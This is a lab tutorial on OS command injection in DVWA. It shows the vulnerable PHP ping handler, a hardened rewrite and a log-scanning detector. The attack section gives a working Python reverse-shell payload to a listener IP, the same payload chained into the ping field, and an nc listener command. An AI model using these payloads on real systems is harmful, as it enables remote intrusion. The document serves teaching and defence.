Command Injection with DVWA
Background
Injection attacks are number 3 on the OWASP Top 10. Injection covers several attack types, including SQL, OS command, and LDAP injection, and the OWASP category maps to 33 Common Weakness Enumerations (CWEs). We'll use DVWA to demonstrate a simple exploitation of an OS command injection vulnerability.
The application uses a PHP script to execute a ping command and reflect the results back to the user. The user supplies the input, and if that input is not properly validated or escaped, an injection vulnerability may exist.

Source Code Review
// vulnerable php script
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $target = $_REQUEST[ 'ip' ];

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping -c 4 ' . $target );
    }

    // Feedback for the end user
    echo "<pre>{$cmd}</pre>";
}
?>
The source code shows that no validation or escaping is performed on the input we submit: the ip value read from $_REQUEST is concatenated straight into the string passed to shell_exec(). We can simply chain an OS-level command to achieve remote code execution; as an example, I will exploit the vulnerability to open a reverse shell.
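For contrast, here is a hardened version of the same handler. It is an added example, not DVWA's own code, and it assumes the same form field names (ip and Submit) as the vulnerable script. The input is allow-listed as an IP address before it gets anywhere near the shell, escapeshellarg() is kept as a second layer, the raw input is never echoed back, and the ping output is HTML-encoded. Run from the command line, the script exercises validate_ip() against a few constructed inputs, one of them shaped like the chained payload discussed on this page.

```php
<?php
// Added example, not DVWA's own code: a hardened version of the ping handler.
// Assumes the same form field names ('ip' and 'Submit') as the vulnerable script.

/**
 * Return the input as a validated IP address, or null if it is anything else.
 * Strict allow-listing is the primary control: no shell metacharacter
 * (& ; | ` $ and so on) can survive FILTER_VALIDATE_IP.
 */
function validate_ip( string $input ): ?string {
    $valid = filter_var( trim( $input ), FILTER_VALIDATE_IP );
    return $valid === false ? null : $valid;
}

/**
 * Build the ping command for the current OS. escapeshellarg() is a second
 * layer of defence: the target reaches the shell as one quoted argument
 * even if the validation above were ever loosened.
 */
function build_ping_command( string $ip ): string {
    $arg = escapeshellarg( $ip );
    if ( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        return 'ping ' . $arg;
    }
    return 'ping -c 4 ' . $arg;
}

if ( PHP_SAPI === 'cli' ) {
    // Offline self-check with constructed inputs; the second one is shaped
    // like a chained payload and must be rejected before any command is built.
    foreach ( [ '8.8.8.8', '8.8.8.8 & id', '2001:db8::1', '' ] as $sample ) {
        $ip = validate_ip( $sample );
        printf( "%-16s -> %s\n", var_export( $sample, true ),
            $ip === null ? 'rejected' : 'accepted: ' . build_ping_command( $ip ) );
    }
} elseif ( isset( $_POST[ 'Submit' ] ) ) {
    // Read $_POST only: $_REQUEST would also accept GET and cookie values.
    $target = validate_ip( (string) ( $_POST[ 'ip' ] ?? '' ) );

    if ( $target === null ) {
        // Log the rejection for detection purposes, but never echo the raw input.
        error_log( 'ping form: rejected input that is not an IP address' );
        echo '<pre>ERROR: please enter a valid IP address.</pre>';
    } else {
        $output = shell_exec( build_ping_command( $target ) );
        // Encode the output so nothing ping prints is rendered as HTML.
        echo '<pre>' . htmlspecialchars( (string) $output, ENT_QUOTES, 'UTF-8' ) . '</pre>';
    }
}
```

Running it with php -f hardened_ping.php prints the self-check: the plain IPv4 and IPv6 addresses are accepted and turned into quoted ping commands, while the chained input and the empty string are rejected. The allow-list does the real work; escapeshellarg() only matters if someone later relaxes validate_ip() to accept hostnames.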
Exploiting to get a shell

How to Reproduce
You will need a reverse shell payload; there are many published examples using Python, /bin/bash, socat and others. I used a Python payload.
# Reverse Shell Payload
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.0.128",8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
The payload is chained onto a ping to 8.8.8.8 with the & operator, so the shell runs the inline Python script alongside the ping.
# Command Injection Payload
8.8.8.8 & python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.0.128",8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
Make sure your listener is ready for the incoming connection.
# Set up listener with nc
nc -lvp 8888
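From the defender's side, an attempt like the one above leaves a recognisable trace: shell metacharacters inside a parameter that should only ever hold an IP address. The following PHP script is an added example (not part of the original write-up) that scans Apache combined-format access log lines for the DVWA ping form and flags ip values that are not clean IP addresses. The /dvwa/vulnerabilities/exec/ path and the log lines are constructed for illustration. Because the vulnerable script reads $_REQUEST, a payload can be submitted via GET and so appears in the request line; payloads sent in a POST body are not in standard access logs and need application-level logging or a WAF to catch.

```php
<?php
// Added example, not part of the original write-up: flag command-injection
// attempts against the DVWA ping form in web server access logs.
// The DVWA path and the log lines below are assumed/constructed for illustration.

// Characters and sequences that never belong in an IP address field.
const SHELL_METACHARS = '/[;&|`$<>\n]|\$\(/';

/**
 * Pull the 'ip' query parameter out of a combined-format access log line.
 * Returns null if the request line carries no ip parameter.
 */
function extract_ip_param( string $line ): ?string {
    if ( ! preg_match( '/"(?:GET|POST) (\S+) HTTP\//', $line, $m ) ) {
        return null;
    }
    $query = parse_url( $m[1], PHP_URL_QUERY );
    if ( ! is_string( $query ) ) {
        return null;
    }
    parse_str( $query, $params ); // also URL-decodes %26, %3B, '+' and so on
    return isset( $params['ip'] ) ? (string) $params['ip'] : null;
}

/**
 * 'ok' for a bare IP, 'suspicious' when shell metacharacters are present,
 * 'malformed' for anything else (typos, hostnames, empty values).
 */
function classify_ip_value( string $value ): string {
    if ( filter_var( $value, FILTER_VALIDATE_IP ) !== false ) {
        return 'ok';
    }
    return preg_match( SHELL_METACHARS, $value ) ? 'suspicious' : 'malformed';
}

/** Return one finding per log line whose ip parameter is not a clean IP. */
function scan_log_lines( array $lines ): array {
    $findings = [];
    foreach ( $lines as $index => $line ) {
        $value = extract_ip_param( $line );
        if ( $value === null ) {
            continue;
        }
        $verdict = classify_ip_value( $value );
        if ( $verdict !== 'ok' ) {
            $findings[] = [ 'line' => $index + 1, 'ip' => $value, 'verdict' => $verdict ];
        }
    }
    return $findings;
}

// Constructed sample lines (Apache combined format). The second one carries
// a chained command in the ip parameter, URL-encoded in a GET request; the
// vulnerable script reads $_REQUEST, so a GET submission reaches it too.
$sample_log = [
    '192.0.2.10 - - [01/Jan/2024:12:00:00 +0000] "GET /dvwa/vulnerabilities/exec/?ip=8.8.8.8&Submit=Submit HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [01/Jan/2024:12:00:05 +0000] "GET /dvwa/vulnerabilities/exec/?ip=8.8.8.8%26+id&Submit=Submit HTTP/1.1" 200 640 "-" "curl/8.0"',
    '192.0.2.10 - - [01/Jan/2024:12:00:09 +0000] "POST /dvwa/vulnerabilities/exec/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
];

foreach ( scan_log_lines( $sample_log ) as $f ) {
    printf( "line %d: %s ip=%s\n", $f['line'], $f['verdict'], $f['ip'] );
}
```

On the sample above, only the second line is reported (as suspicious, with the decoded value 8.8.8.8& id); the first is a clean IP and the third has no ip parameter in its request line. To use it on real data, replace $sample_log with the lines of the access log, for example via file('access.log', FILE_IGNORE_NEW_LINES).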

You can try many different payloads; there is no guarantee that Python is installed on every server. I have linked some resources on payloads and more details on command injection below.
Resources